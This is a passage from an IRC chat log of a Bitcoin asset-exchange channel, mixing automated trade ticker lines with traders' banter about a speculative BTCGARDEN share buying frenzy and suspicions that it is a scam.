150 @ 0.0018 = 0.27 BTC [-] Aug 03 12:28:16 [BTCTC] [BTCGARDEN] 62 @ 0.016 = 0.992 BTC [+] Aug 03 12:28:20 i could use a few percent after this week tbh Aug 03 12:28:34 who is the big buyers? Aug 03 12:28:34 [BTCTC] [BTCGARDEN] 40 @ 0.016 = 0.64 BTC [+] Aug 03 12:28:45 chinese overlords ofc Aug 03 12:28:47 [BTCTC] [BTCGARDEN] 1800 @ 0.016 = 28.8 BTC [+] Aug 03 12:28:50 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:28:54 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 12:29:20 [BTCTC] [LABCOIN] 100 @ 0.0018 = 0.18 BTC [-] Aug 03 12:29:21 [BTCTC] [BTCGARDEN] 56 @ 0.016 = 0.896 BTC [+] Aug 03 12:29:27 [BTCTC] [BTCGARDEN] 700 @ 0.016 = 11.2 BTC [+] Aug 03 12:29:57 [BTCTC] [LABCOIN] 4 @ 0.001789 = 0.0072 BTC [-] Aug 03 12:29:58 [BTCTC] [BTCGARDEN] 61 @ 0.016 = 0.976 BTC [+] Aug 03 12:29:59 [BTCTC] [LABCOIN] 3000 @ 0.001776 = 5.328 BTC [-] Aug 03 12:30:00 [BTCTC] [LABCOIN] 220 @ 0.001775 = 0.3905 BTC [-] Aug 03 12:30:02 [BTCTC] [LABCOIN] 500 @ 0.001771 = 0.8855 BTC [-] Aug 03 12:30:03 [BTCTC] [LABCOIN] 498 @ 0.001757 = 0.875 BTC [-] Aug 03 12:30:05 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 12:30:06 [BTCTC] [ACTIVEMINING] 40 @ 0.005109 = 0.2044 BTC [-] Aug 03 12:30:26 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 12:30:29 [BTCTC] [BTCGARDEN] 25 @ 0.016 = 0.4 BTC [+] Aug 03 12:30:31 [BTCTC] [BTCGARDEN] 73 @ 0.016 = 1.168 BTC [+] Aug 03 12:30:38 [BTCTC] [LABCOIN] 83 @ 0.001799 = 0.1493 BTC [+] Aug 03 12:30:39 [BTCTC] [BTCGARDEN] 220 @ 0.016 = 3.52 BTC [+] Aug 03 12:30:39 [BTCTC] [ACTIVEMINING] 20 @ 0.0051 = 0.102 BTC [-] Aug 03 12:30:44 [BTCTC] [BTCGARDEN] 3 @ 0.016 = 0.048 BTC [+] Aug 03 12:30:45 [BTCTC] [ACTIVEMINING] 10 @ 0.0051 = 0.051 BTC [-] Aug 03 12:30:47 [BTCTC] [BTCGARDEN] 20 @ 0.016 = 0.32 BTC [+] Aug 03 12:30:48 [BTCTC] [ACTIVEMINING] 970 @ 0.005 = 4.85 BTC [-] Aug 03 12:30:51 [BTCTC] [ACTIVEMINING] 1405 @ 0.005 = 7.025 BTC [-] Aug 03 12:30:56 [BTCTC] [ACTIVEMINING] 622 @ 0.005 = 3.11 BTC [-] Aug 03 12:31:30 [BTCTC] [LABCOIN] 6 @ 0.001799 = 0.0108 BTC [+] Aug 03 12:31:31 [BTCTC] [BTCGARDEN] 440 @ 0.016 = 7.04 BTC [+] Aug 03 12:31:34 [BTCTC] [BTCGARDEN] 311 @ 0.016 = 4.976 BTC [+] Aug 03 12:31:53 [BTCTC] [BTCGARDEN] 300 @ 0.016 = 4.8 BTC [+] Aug 03 12:32:01 [BTCTC] [BTCGARDEN] 5 @ 0.016 = 0.08 BTC [+] Aug 03 12:32:51 [BTCTC] [BTCGARDEN] 13000 @ 0.016 = 208 BTC [+] Aug 03 12:32:56 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 12:33:14 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 12:33:30 [BTCTC] [BTCGARDEN] 125 @ 0.016 = 2 BTC [+] Aug 03 12:33:33 [BTCTC] [BTCGARDEN] 75 @ 0.016 = 1.2 BTC [+] Aug 03 12:33:36 [BTCTC] [BTCGARDEN] 6100 @ 0.016 = 97.6 BTC [+] Aug 03 12:33:40 how much coin has garden raised nownow? Aug 03 12:34:07 [BTCTC] [LABCOIN] 83 @ 0.001759 = 0.146 BTC [-] Aug 03 12:34:08 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 03 12:34:09 2m x 0.016 Aug 03 12:34:10 [BTCTC] [LABCOIN] 500 @ 0.001758 = 0.879 BTC [-] Aug 03 12:34:10 [BTCTC] [LABCOIN] 81 @ 0.001758 = 0.1424 BTC [-] Aug 03 12:34:11 [BTCTC] [LABCOIN] 235 @ 0.001757 = 0.4129 BTC [-] Aug 03 12:34:12 [BTCTC] [LABCOIN] 300 @ 0.001757 = 0.5271 BTC [-] Aug 03 12:34:13 32k Aug 03 12:34:14 [BTCTC] [LABCOIN] 100 @ 0.001757 = 0.1757 BTC [-] Aug 03 12:34:24 [BTCTC] [LABCOIN] 2019 @ 0.001756 = 3.5454 BTC [-] Aug 03 12:34:26 with 2m shares still coming Aug 03 12:34:27 [BTCTC] [BTCGARDEN] 37 @ 0.016 = 0.592 BTC [+] Aug 03 12:34:28 [BTCTC] [LABCOIN] 1720 @ 0.001756 = 3.0203 BTC [-] Aug 03 12:34:32 [BTCTC] [BTCGARDEN] 420 @ 0.016 = 6.72 BTC [+] Aug 03 12:34:33 [BTCTC] [ACTIVEMINING] 60 @ 0.005001 = 0.3001 BTC [+] Aug 03 12:34:43 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 12:34:54 [BTCTC] [BTCGARDEN] 130 @ 0.016 = 2.08 BTC [+] Aug 03 12:34:56 [BTCTC] [ASICMINER-PT] 2 @ 3.852 = 7.704 BTC [+] Aug 03 12:34:57 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [+] Aug 03 12:34:58 [BTCTC] [ASICMINER-PT] 1 @ 3.851 BTC [-] Aug 03 12:34:59 [BTCTC] [ASICMINER-PT] 8 @ 3.85 = 30.8 BTC [-] Aug 03 12:35:03 its picking up even more now, just got 300 more Aug 03 12:35:03 [BTCTC] [BTCGARDEN] 350 @ 0.016 = 5.6 BTC [+] Aug 03 12:35:09 lets see Aug 03 12:35:33 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 12:35:58 [BTCTC] [BTCGARDEN] 187 @ 0.016 = 2.992 BTC [+] Aug 03 12:36:02 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:36:07 [BTCTC] [BTCGARDEN] 10 @ 0.016 = 0.16 BTC [+] Aug 03 12:36:17 [BTCTC] [BTCGARDEN] 23 @ 0.016 = 0.368 BTC [+] Aug 03 12:36:32 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:36:33 [BTCTC] [LABCOIN] 500 @ 0.001756 = 0.878 BTC [-] Aug 03 12:36:35 of course btcgarden could just be using investments to rebuy their own stock to create this frenzy Aug 03 12:36:36 the other 2 million won't be issued right now anyway if they stick to their word Aug 03 12:36:52 https://bitcointalk.org/index.php?topic=264696.msg2858437#msg2858437 Aug 03 12:36:52 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:36:54 [BTCTC] [BTCGARDEN] 180 @ 0.016 = 2.88 BTC [+] Aug 03 12:36:56 dont the divs have to be paid back double the ipo price first Aug 03 12:36:56 [BTCTC] [TAT.ASICMINER] 1 @ 0.0367 BTC [-] Aug 03 12:36:56 [BTCT.CO] [IPO] [FAQ]BTCGARDEN MINER---Eyes to the horizon Aug 03 12:36:57 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 03 12:37:00 before they sell more Aug 03 12:37:16 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 03 12:37:20 [BTCTC] [BTCGARDEN] 77 @ 0.016 = 1.232 BTC [+] Aug 03 12:37:22 [BTCTC] [BTCGARDEN] 55 @ 0.016 = 0.88 BTC [+] Aug 03 12:37:40 [BTCTC] [BTCGARDEN] 15 @ 0.016 = 0.24 BTC [+] Aug 03 12:37:46 [BTCTC] [BTCGARDEN] 18 @ 0.016 = 0.288 BTC [+] Aug 03 12:37:51 [BTCTC] [BTCGARDEN] 360 @ 0.016 = 5.76 BTC [+] Aug 03 12:37:52 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 12:37:53 its daytime in china and late night everywhere else so it is a little suspicious why there is a buying frenzy for btcgarden Aug 03 12:37:55 [BTCTC] [BTCGARDEN] 280 @ 0.016 = 4.48 BTC [+] Aug 03 12:37:59 [BTCTC] [BTCGARDEN] 8 @ 0.016 = 0.128 BTC [+] Aug 03 12:38:06 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:38:07 right this moment Aug 03 12:38:10 Unless this is just the ipo chinese BTC holders can get behind Aug 03 12:38:13 [BTCTC] [BTCGARDEN] 7 @ 0.016 = 0.112 BTC [+] Aug 03 12:38:13 dandate2: and why is that suspicous? Aug 03 12:38:16 [BTCTC] [BTCGARDEN] 2 @ 0.016 = 0.032 BTC [+] Aug 03 12:38:32 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 03 12:38:33 not even mtgox has volume like this at this hour heh Aug 03 12:38:45 cause 2mill are about to run out Aug 03 12:38:57 [BTCTC] [KENILWORTH] 19 @ 0.001755 = 0.0333 BTC [+] Aug 03 12:38:59 what happens when it runs out? Aug 03 12:39:11 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 03 12:39:12 free for all Aug 03 12:39:19 [BTCTC] [BTCGARDEN] 50 @ 0.016 = 0.8 BTC [+] Aug 03 12:39:29 [BTCTC] [BTCGARDEN] 2185 @ 0.016 = 34.96 BTC [+] Aug 03 12:39:31 u mean we get dumped on by the chinese and lose all our money heh Aug 03 12:39:32 yeah, no way that 32k in coin on one stock is real Aug 03 12:39:59 well btct surpassed gox multiple times the last weeks Aug 03 12:40:08 btcgarden laughing all the way to the bank because they created some 2d photo of what might be a microchip and put it on their webrsite Aug 03 12:40:14 [BTCTC] [BTCGARDEN] 1 @ 0.01601 BTC [+] Aug 03 12:40:15 [BTCTC] [BTCGARDEN] 1 @ 0.01601 BTC [+] Aug 03 12:40:21 it begins Aug 03 12:40:42 silence Aug 03 12:40:51 [BTCTC] [BTCGARDEN] 10 @ 0.0165 = 0.165 BTC [+] Aug 03 12:40:54 [BTCTC] [BTCGARDEN] 149 @ 0.0165 = 2.4585 BTC [+] Aug 03 12:41:07 lol Aug 03 12:41:11 huh, already?... Aug 03 12:41:11 why ar ethere no asks Aug 03 12:41:13 [BTCTC] [TAT.MINIGAME] 1002 @ 0.0002401 = 0.2406 BTC [-] Aug 03 12:41:24 [BTCTC] [TAT.MINIGAME] 3297 @ 0.00024 = 0.7913 BTC [-] Aug 03 12:41:30 noone wants to sell cheap i guess Aug 03 12:41:40 suuuure Aug 03 12:41:44 there are too much asks Aug 03 12:41:45 people waiting for more info on next 2mill Aug 03 12:42:01 [BTCTC] [BTCGARDEN] 1 @ 0.01689 BTC [+] Aug 03 12:42:03 522 btc till .02 Aug 03 12:42:14 [BTCTC] [BTCGARDEN] 1 @ 0.01689 BTC [+] Aug 03 12:42:15 [BTCTC] [ACTIVEMINING] 2 @ 0.005002 = 0.01 BTC [+] Aug 03 12:42:19 [BTCTC] [BTCGARDEN] 37 @ 0.01689 = 0.6249 BTC [+] Aug 03 12:42:24 lab started with 0 asks and an instant jump to .003 Aug 03 12:42:26 [BTCTC] [DMS.SELLING] 22 @ 0.02425 = 0.5335 BTC [-] Aug 03 12:42:31 i really hope one of these scammers runs sooner than later Aug 03 12:42:33 [BTCTC] [LABCOIN] 400 @ 0.001756 = 0.7024 BTC [-] Aug 03 12:42:38 lol Aug 03 12:42:41 lessons need to be learned Aug 03 12:42:43 but Aug 03 12:42:46 one day this will happen Aug 03 12:43:00 [BTCTC] [LABCOIN] 1 @ 0.00183 BTC [+] Aug 03 12:43:01 [BTCTC] [ASICMINER-PT] 1 @ 3.85 BTC [-] Aug 03 12:43:12 [BTCTC] [BTCGARDEN] 50 @ 0.0169 = 0.845 BTC [+] Aug 03 12:43:25 [BTCTC] [BTCGARDEN] 50 @ 0.01689 = 0.8445 BTC [-] Aug 03 12:43:27 [BTCTC] [LABCOIN] 1220 @ 0.001756 = 2.1423 BTC [-] Aug 03 12:43:37 everyone getting out of labcoin to get the last btcgarden... its ridiculous Aug 03 12:43:53 it's altcoins man Aug 03 12:43:58 [BTCTC] [BTCGARDEN] 12 @ 0.01699 = 0.2039 BTC [+] Aug 03 12:44:00 [BTCTC] [ACTIVEMINING] 1 @ 0.005002 BTC [+] Aug 03 12:44:03 well it doesn't help we just got a photo of fpga plugged into 3g router Aug 03 12:44:06 [BTCTC] [ASICMINER-PT] 2 @ 3.95 = 7.9 BTC [+] Aug 03 12:44:13 yeah true, where's fontas? Aug 03 12:44:19 [BTCTC] [BTCGARDEN] 4 @ 0.017 = 0.068 BTC [+] Aug 03 12:44:19 33k btc lenova laptop Aug 03 12:44:19 [BTCTC] [BTCGARDEN] 1 @ 0.0176 BTC [+] Aug 03 12:44:20 [BTCTC] [BTCGARDEN] 7 @ 0.018 = 0.126 BTC [+] Aug 03 12:44:21 [BTCTC] [BTCGARDEN] 16 @ 0.01882 = 0.3011 BTC [+] Aug 03 12:44:23 [BTCTC] [BTCGARDEN] 8 @ 0.018 = 0.144 BTC [-] Aug 03 12:44:29 dont call them by their names, call them by there coin names Aug 03 12:44:41 we have labcoins, gardencoins, activecoins Aug 03 12:44:46 and tatcoins Aug 03 12:44:48 :) Aug 03 12:44:52 [BTCTC] [ACTIVEMINING] 3 @ 0.005001 = 0.015 BTC [-] Aug 03 12:44:57 [BTCTC] [BTCGARDEN] 170 @ 0.01881 = 3.1977 BTC [+] Aug 03 12:44:58 [BTCTC] [BTCGARDEN] 52 @ 0.01882 = 0.9786 BTC [+] Aug 03 12:44:59 [BTCTC] [BTCGARDEN] 78 @ 0.01883 = 1.4687 BTC [+] Aug 03 12:45:01 the thing is, if it actually works, not sure what to think Aug 03 12:45:18 should i hold my asicminer-pt Aug 03 12:45:27 btc price will probably crash Aug 03 12:45:27 no SELL SELL SELL Aug 03 12:45:31 [BTCTC] [BTCGARDEN] 100 @ 0.0187 = 1.87 BTC [-] Aug 03 12:45:40 [BTCTC] [BTCGARDEN] 1 @ 0.01701 BTC [-] Aug 03 12:45:50 [BTCTC] [TAT.MINIGAME] 2222 @ 0.00024 = 0.5333 BTC [-] Aug 03 12:45:53 if this is the new reality, then xbonds are well-timed - Pre-IPO access will be like premining Aug 03 12:45:53 [BTCTC] [ACTIVEMINING] 12 @ 0.005 = 0.06 BTC [-] Aug 03 12:45:56 [BTCTC] [BTCGARDEN] 222 @ 0.01883 = 4.1803 BTC [+] Aug 03 12:45:57 [BTCTC] [BTCGARDEN] 800 @ 0.01883 = 15.064 BTC [+] Aug 03 12:45:58 [BTCTC] [BTCGARDEN] 25 @ 0.01883 = 0.4708 BTC [+] Aug 03 12:46:00 [BTCTC] [BTCGARDEN] 3 @ 0.01884 = 0.0565 BTC [+] Aug 03 12:46:13 [BTCTC] [ASICMINER-PT] 1 @ 3.949 BTC [-] Aug 03 12:46:14 [BTCTC] [ASICMINER-PT] 1 @ 3.999 BTC [+] Aug 03 12:46:24 new reality = me being worth 1 billion dollars with no business plan Aug 03 12:46:36 well, yeah, I thought you already realized that :p Aug 03 12:46:39 labcoin profit: -32.3339017 BTC Aug 03 12:46:52 BTCGARDEN profit +32.1687 Aug 03 12:46:54 :) Aug 03 12:46:59 anyway not my money, just really retarded marketplace Aug 03 12:47:03 how did you not profit on labcoin? Aug 03 12:47:08 those fuckers Aug 03 12:47:20 had to make withdrawal of 0.0001 Aug 03 12:47:26 [BTCTC] [LABCOIN] 1 @ 0.001944 BTC [+] Aug 03 12:47:26 i try to buy 200,000 Aug 03 12:47:29 [BTCTC] [LABCOIN] 105 @ 0.001944 = 0.2041 BTC [+] Aug 03 12:47:31 and pay 0.3 Aug 03 12:48:16 [BTCTC] [LABCOIN] 105 @ 0.001761 = 0.1849 BTC [-] Aug 03 12:49:09 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [+] Aug 03 12:49:09 [BTCTC] [ASICMINER-PT] 2 @ 4.011 = 8.022 BTC [+] Aug 03 12:49:10 [BTCTC] [ASICMINER-PT] 1 @ 4.012 BTC [+] Aug 03 12:49:12 [BTCTC] [ASICMINER-PT] 1 @ 4.029 BTC [+] Aug 03 12:49:14 [BTCTC] [LABCOIN] 20 @ 0.001943 = 0.0389 BTC [+] Aug 03 12:49:15 [BTCTC] [LABCOIN] 52 @ 0.001943 = 0.101 BTC [+] Aug 03 12:49:29 [BTCTC] [LABCOIN] 25 @ 0.001943 = 0.0486 BTC [+] Aug 03 12:49:55 [BTCTC] [TAT.ASICMINER] 30 @ 0.0367 = 1.101 BTC [-] Aug 03 12:50:42 userioao and you're calling ME a moran ? Aug 03 12:50:47 yeah moran Aug 03 12:50:52 le lol. Aug 03 12:50:52 [BTCTC] [ASICMINER-PT] 2 @ 4.088 = 8.176 BTC [+] Aug 03 12:50:53 [BTCTC] [ASICMINER-PT] 1 @ 4.089 BTC [+] Aug 03 12:50:55 dumbess Aug 03 12:51:14 get a brain morans Aug 03 12:51:37 looks like btcgarden hype is dead, time to dump? Aug 03 12:51:38 blah, I suck at bitcoin assets. Aug 03 12:51:51 btcgarden crashing SELL SELL SELL Aug 03 12:52:18 who will get caught holding the bag? Aug 03 12:52:22 time to dump all Aug 03 12:52:39 [BTCTC] [TAT.ASICMINER] 6 @ 0.0387 = 0.2322 BTC [+] Aug 03 12:52:40 [BTCTC] [TAT.ASICMINER] 50 @ 0.03871 = 1.9355 BTC [+] Aug 03 12:52:41 [BTCTC] [TAT.ASICMINER] 1 @ 0.03871 BTC [+] Aug 03 12:52:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.04039 = 0.0808 BTC [+] Aug 03 12:52:43 [BTCTC] [TAT.ASICMINER] 3 @ 0.0404 = 0.1212 BTC [+] Aug 03 12:52:44 [BTCTC] [TAT.ASICMINER] 7 @ 0.0404 = 0.2828 BTC [+] Aug 03 12:52:45 [BTCTC] [TAT.ASICMINER] 10 @ 0.04049 = 0.4049 BTC [+] Aug 03 12:52:46 [BTCTC] [TAT.ASICMINER] 21 @ 0.0405 = 0.8505 BTC [+] Aug 03 12:52:54 asicminer back in play Aug 03 12:53:25 [HAVELOCK] [AM100] 31 @ 0.0365 = 1.1315 BTC [-] Aug 03 12:54:09 cognitive is taking a beating :/ Aug 03 12:54:19 [BTCTC] [ACTIVEMINING] 25 @ 0.005468 = 0.1367 BTC [+] Aug 03 12:54:20 [BTCTC] [ACTIVEMINING] 18 @ 0.005469 = 0.0984 BTC [+] Aug 03 12:54:20 needs more news about bfl shipping Aug 03 12:54:21 [BTCTC] [ACTIVEMINING] 50 @ 0.005471 = 0.2736 BTC [+] Aug 03 12:54:22 [BTCTC] [ACTIVEMINING] 5 @ 0.005786 = 0.0289 BTC [+] Aug 03 12:54:22 [BTCTC] [ACTIVEMINING] 20 @ 0.005787 = 0.1157 BTC [+] Aug 03 12:54:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005791 = 0.1448 BTC [+] Aug 03 12:54:56 lol Aug 03 12:55:16 [BTCTC] [ACTIVEMINING] 25 @ 0.005791 = 0.1448 BTC [+] Aug 03 12:55:36 [BTCTC] [ACTIVEMINING] 25 @ 0.005789 = 0.1447 BTC [-] Aug 03 12:55:37 [BTCTC] [ACTIVEMINING] 50 @ 0.00579 = 0.2895 BTC [+] Aug 03 12:55:51 0:45 (S) 2222 @ 0.00024000 TAT.MINIGAME Aug 03 12:55:54 down gogogo Aug 03 12:55:58 [BTCTC] [BASIC-MINING] 1 @ 0.3867 BTC [-] Aug 03 12:55:59 this is pretty funny Aug 03 12:56:05 who the hlel is going to buy a depository receipt called ThickasThieves Aug 03 12:56:07 [HAVELOCK] [XBOND] 770 @ 0.00102998 = 0.7931 BTC [-] Aug 03 12:56:23 btcgarden buys all their own shares, no one around to pick up the real ones Aug 03 12:56:31 [BTCTC] [BTCGARDEN] 110 @ 0.01884 = 2.0724 BTC [+] Aug 03 12:56:34 [BTCTC] [BTCGARDEN] 1 @ 0.0165 BTC [-] Aug 03 12:56:37 I am called ThickAsThieves Aug 03 12:56:46 dandate2: the same who buy from kSLAUGHTER Aug 03 12:56:46 deal with it. Aug 03 12:56:52 [BTCTC] [ACTIVEMINING] 25 @ 0.005787 = 0.1447 BTC [-] Aug 03 12:56:53 [BTCTC] [ACTIVEMINING] 137 @ 0.005788 = 0.793 BTC [+] Aug 03 12:57:03 [BTCTC] [BTCGARDEN] 52 @ 0.0165 = 0.858 BTC [-] Aug 03 12:57:30 it means "loyal" Aug 03 12:58:21 what time is it in asia? Aug 03 12:58:35 breakfast time Aug 03 12:58:39 17:58 Aug 03 12:58:47 egg foo yung Aug 03 12:58:47 [BTCTC] [BTCGARDEN] 8 @ 0.017 = 0.136 BTC [+] Aug 03 12:58:48 [BTCTC] [BTCGARDEN] 3 @ 0.01656 = 0.0497 BTC [-] Aug 03 12:58:50 [BTCTC] [BTCGARDEN] 2 @ 0.01601 = 0.032 BTC [-] Aug 03 12:58:53 [BTCTC] [BTCGARDEN] 80 @ 0.01601 = 1.2808 BTC [-] Aug 03 12:58:57 oh jesus its tanking Aug 03 12:59:07 abort Aug 03 12:59:12 lord have mercy Aug 03 12:59:17 sell all Aug 03 12:59:26 no depth to sell Aug 03 12:59:32 [HAVELOCK] [LABCO] 50 @ 0.00290001 = 0.145 BTC [+] Aug 03 12:59:35 [HAVELOCK] [LABCO] 50 @ 0.002998 = 0.1499 BTC [+] Aug 03 12:59:37 before too late, by tomorrow it will be less than zero Aug 03 12:59:43 double dip ipo? Aug 03 12:59:54 we just made a prince in nigera very happy Aug 03 12:59:55 [HAVELOCK] [SMG] 5 @ 0.000235 = 0.0012 BTC [-] Aug 03 12:59:57 [BTCTC] [BTCGARDEN] 60 @ 0.01601 = 0.9606 BTC [-] Aug 03 12:59:59 i want to make some long term investments without watching this channel all the time, what yall recommend? Aug 03 13:00:11 dandate2: switch off laptop Aug 03 13:00:16 put it all in btcgarden Aug 03 13:00:19 xbond maybe :pp Aug 03 13:00:21 sell the house too Aug 03 13:00:24 [BTCTC] [BITVPS] 250 @ 0.001898 = 0.4745 BTC [+] Aug 03 13:00:33 [BTCTC] [BTCGARDEN] 1 @ 0.0169 BTC [+] Aug 03 13:00:34 [BTCTC] [BITVPS] 43 @ 0.001899 = 0.0817 BTC [+] Aug 03 13:00:38 [BTCTC] [BTCGARDEN] 300 @ 0.01699 = 5.097 BTC [+] Aug 03 13:00:39 [BTCTC] [BITVPS] 25 @ 0.001901 = 0.0475 BTC [+] Aug 03 13:00:42 [BTCTC] [BTCGARDEN] 100 @ 0.017 = 1.7 BTC [+] Aug 03 13:00:43 [BTCTC] [BITVPS] 120 @ 0.001925 = 0.231 BTC [+] Aug 03 13:00:49 [BTCTC] [BITVPS] 100 @ 0.00195 = 0.195 BTC [+] Aug 03 13:00:50 [BTCTC] [ACTIVEMINING] 25 @ 0.005785 = 0.1446 BTC [-] Aug 03 13:00:51 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [-] Aug 03 13:00:53 [BTCTC] [BITVPS] 100 @ 0.001975 = 0.1975 BTC [+] Aug 03 13:00:53 holy shit some idiot bought btc garden Aug 03 13:00:53 [BTCTC] [ACTIVEMINING] 414 @ 0.005786 = 2.3954 BTC [+] Aug 03 13:00:54 theres hope Aug 03 13:00:54 [BTCTC] [BITVPS] 100 @ 0.001996 = 0.1996 BTC [+] Aug 03 13:00:55 [BTCTC] [ACTIVEMINING] 211 @ 0.005788 = 1.2213 BTC [+] Aug 03 13:00:56 [BTCTC] [BITVPS] 100 @ 0.001999 = 0.1999 BTC [+] Aug 03 13:00:57 [BTCTC] [BITVPS] 162 @ 0.002 = 0.324 BTC [+] Aug 03 13:00:58 [BTCTC] [LABCOIN] 1 @ 0.001948 BTC [+] Aug 03 13:01:02 [BTCTC] [BTCGARDEN] 50 @ 0.01675 = 0.8375 BTC [+] Aug 03 13:01:09 [BTCTC] [BTCGARDEN] 42 @ 0.01675 = 0.7035 BTC [+] Aug 03 13:01:16 if you wanna be hands-off, buy bonds, sure Aug 03 13:01:35 buy land Aug 03 13:01:39 god ain't making any more of it Aug 03 13:01:42 i was interested in sin stocks also tho, is satoshidice the only one on here? Aug 03 13:01:47 [HAVELOCK] [XBOND] 39 @ 0.00102999 = 0.0402 BTC [+] Aug 03 13:01:55 [BTCTC] [BITVPS] 138 @ 0.002 = 0.276 BTC [+] Aug 03 13:01:57 [BTCTC] [BITVPS] 162 @ 0.002 = 0.324 BTC [+] Aug 03 13:01:58 [BTCTC] [BTCGARDEN] 50 @ 0.01699 = 0.8495 BTC [+] Aug 03 13:02:02 www.just-dice.com Aug 03 13:02:08 you invest in the house directly Aug 03 13:02:10 [BTCTC] [BITVPS] 309 @ 0.002 = 0.618 BTC [+] Aug 03 13:02:15 k 600 btc on .016 Aug 03 13:02:18 [BTCTC] [BTCGARDEN] 42 @ 0.017 = 0.714 BTC [+] Aug 03 13:02:19 [BTCTC] [BTCGARDEN] 100 @ 0.017 = 1.7 BTC [+] Aug 03 13:02:28 [BTCTC] [BTCGARDEN] 8 @ 0.0165 = 0.132 BTC [-] Aug 03 13:02:31 [BTCTC] [BTCGARDEN] 2 @ 0.0165 = 0.033 BTC [-] Aug 03 13:03:23 [BTCTC] [ACTIVEMINING] 10 @ 0.005779 = 0.0578 BTC [-] Aug 03 13:04:41 http://www.bitpremier.com/items/view/51 Aug 03 13:04:43 BitPremier — Private Island in Micronesia Aug 03 13:04:56 buying island so stupid Aug 03 13:05:21 [BTCTC] [BTCGARDEN] 1 @ 0.01795 BTC [+] Aug 03 13:05:22 [BTCTC] [BTCGARDEN] 22 @ 0.01796 = 0.3951 BTC [+] Aug 03 13:05:39 [BTCTC] [BTCGARDEN] 110 @ 0.01796 = 1.9756 BTC [+] Aug 03 13:05:49 hey god aint making any more of em Aug 03 13:05:55 [BTCTC] [BTCGARDEN] 26 @ 0.01796 = 0.467 BTC [+] Aug 03 13:05:55 [BTCTC] [BTCGARDEN] 50 @ 0.01797 = 0.8985 BTC [+] Aug 03 13:06:01 It's gonna be under the see soon Aug 03 13:06:05 No point in buying it Aug 03 13:06:06 60k on a porsche 911 Aug 03 13:06:24 reminds me of a disney song Aug 03 13:06:28 [BTCTC] [BTCGARDEN] 100 @ 0.01797 = 1.797 BTC [+] Aug 03 13:06:31 [BTCTC] [BTCGARDEN] 100 @ 0.01797 = 1.797 BTC [+] Aug 03 13:06:32 lol and 10k ona shitty watercolour Aug 03 13:06:36 [BTCTC] [BTCGARDEN] 200 @ 0.01797 = 3.594 BTC [+] Aug 03 13:06:48 [BTCTC] [BTCGARDEN] 74 @ 0.01797 = 1.3298 BTC [+] Aug 03 13:06:56 mabye btcgarden will quadruple in value like labcoin the other day Aug 03 13:07:07 [BTCTC] [ACTIVEMINING] 25 @ 0.00577 = 0.1443 BTC [-] Aug 03 13:07:10 price!=value Aug 03 13:07:12 i mean its all the same shit right Aug 03 13:07:12 it shouldnt....... Aug 03 13:07:18 [HAVELOCK] [SDSTM] 1 @ 0.00777 BTC [-] Aug 03 13:07:21 actually for some of the tickers, price!=price even Aug 03 13:07:23 its all horse shite. Aug 03 13:07:23 [HAVELOCK] [SDSTM] 1 @ 0.00710001 BTC [-] Aug 03 13:07:25 "Can also be used as fish ponds, python bathing pools, fire pits or tombs." Aug 03 13:08:12 [BTCTC] [ASICMINER-PT] 2 @ 3.902 = 7.804 BTC [-] Aug 03 13:08:38 [BTCTC] [BTCGARDEN] 100 @ 0.01794 = 1.794 BTC [-] Aug 03 13:09:24 [BTCTC] [BTCGARDEN] 100 @ 0.01795 = 1.795 BTC [+] Aug 03 13:10:00 which one is x-bond Aug 03 13:10:37 can i still get in on tatcoin? Aug 03 13:11:19 [BTCTC] [BTCGARDEN] 30 @ 0.01794 = 0.5382 BTC [-] Aug 03 13:11:42 [BTCTC] [BTCGARDEN] 100 @ 0.01793 = 1.793 BTC [-] Aug 03 13:11:43 [BTCTC] [BTCGARDEN] 100 @ 0.01793 = 1.793 BTC [-] Aug 03 13:11:45 [BTCTC] [BTCGARDEN] 230 @ 0.01794 = 4.1262 BTC [+] Aug 03 13:11:58 ftc has surprise me Aug 03 13:12:11 [BTCTC] [BTCGARDEN] 26 @ 0.017 = 0.442 BTC [-] Aug 03 13:12:49 [BTCTC] [BTCGARDEN] 3 @ 0.01793 = 0.0538 BTC [+] Aug 03 13:12:57 [DCX] The Digital Currency Index Project - https://bitcointalk.org/index.php?topic=267351.0 Aug 03 13:13:01 [BTCTC] [BTCGARDEN] 100 @ 0.01793 = 1.793 BTC [+] Aug 03 13:13:30 [BTCTC] [BTCGARDEN] 100 @ 0.0177 = 1.77 BTC [-] Aug 03 13:13:33 tatcoins are at 0.0010299 ea atm Aug 03 13:14:05 [BTCTC] [LABCOIN] 250 @ 0.0019 = 0.475 BTC [-] Aug 03 13:14:42 [BTCTC] [LABCOIN] 100 @ 0.001938 = 0.1938 BTC [+] Aug 03 13:15:07 [BTCTC] [LABCOIN] 20 @ 0.001938 = 0.0388 BTC [+] Aug 03 13:15:22 [BTCTC] [BTCGARDEN] 4 @ 0.017 = 0.068 BTC [-] Aug 03 13:15:23 [BTCTC] [BTCGARDEN] 230 @ 0.017 = 3.91 